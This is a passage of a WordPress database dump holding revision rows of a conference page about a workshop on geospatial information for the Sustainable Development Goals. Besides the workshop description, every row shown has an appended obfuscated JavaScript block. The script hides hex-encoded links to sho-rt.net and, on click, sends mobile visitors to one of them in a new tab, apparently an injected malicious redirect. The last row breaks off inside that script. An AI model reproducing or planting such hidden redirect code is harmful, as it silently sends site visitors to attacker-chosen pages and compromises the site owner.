(2773,1,'2022-10-13 23:32:45','2022-10-13 23:32:45','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x800\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:32:45','2022-10-13 23:32:45','',2768,'https://gsw2023.com/?p=2773',0,'revision','',0),
(2774,1,'2022-10-13 23:33:01','2022-10-13 23:33:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','The Geospatial Information and SDG Nexus: GI4SDGs','','inherit','closed','closed','','2768-revision-v1','','','2022-10-13 23:33:01','2022-10-13 23:33:01','',2768,'https://gsw2023.com/?p=2774',0,'revision','',0),
(2775,1,'2022-10-13 23:38:06','2022-10-13 23:38:06','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2770\" img_size=\"1400x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 tyle=\"text-align:justify; color:black;\"><strong>In September 2015, the United Nations adopted “Transforming Our World: the 2030 Agenda for Sustainable Development” as a new ambitious global development plan with 17 Sustainable Development Goals (SDGs) and 169 targets. Recognizing the complex and diverse challenges the world is facing today, this agenda aims to end extreme poverty, fight inequality and injustice, and combat climate change. In order to ensure its successful implementation, the United Nations has been devoting to establishing a systematic follow-up and review of the progress towards SDGs at national, regional and global levels, through an indicator-based and data-driven monitoring approach.</strong></h5>\n<h5><strong>Reliable and up-to-date geospatial data plays a fundamental role in the monitoring process, and the utilization of geospatial tools in SDGs monitoring has become a critical task for ISPRS and international geospatial communities. In the year 2019, ISPRS council has decided to set up a scientific program on “Geospatial Information-enabled SDGs Monitoring for the 2030 Agenda”, jointly with other international organizations. Its overreaching goal is to promote the best use of geospatial information in supporting SDGs monitoring and analysis through mobilizing and integrating all possible resources from ISPRS members and other stakeholders. The first ISPRS workshop on Geospatial Information for Sustainable Development Goals (GI4SDGs) was successfully organized in Changsha, China from Nov.19-20, 2019.</strong></h5>\n<h5>\n<strong>This second GI4SDGs workshop will provide an interdisciplinary platform to present the latest development and progress in the area of geospatial-enabled SDG monitoring and application. It will bring together people of different communities and disciplines, such as geomatics and remote sensing, environmental and urban studies, deep learning and service computing. Experts and users will present their novel and innovative methods to highlight successful case studies and to explore possible collaboration.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 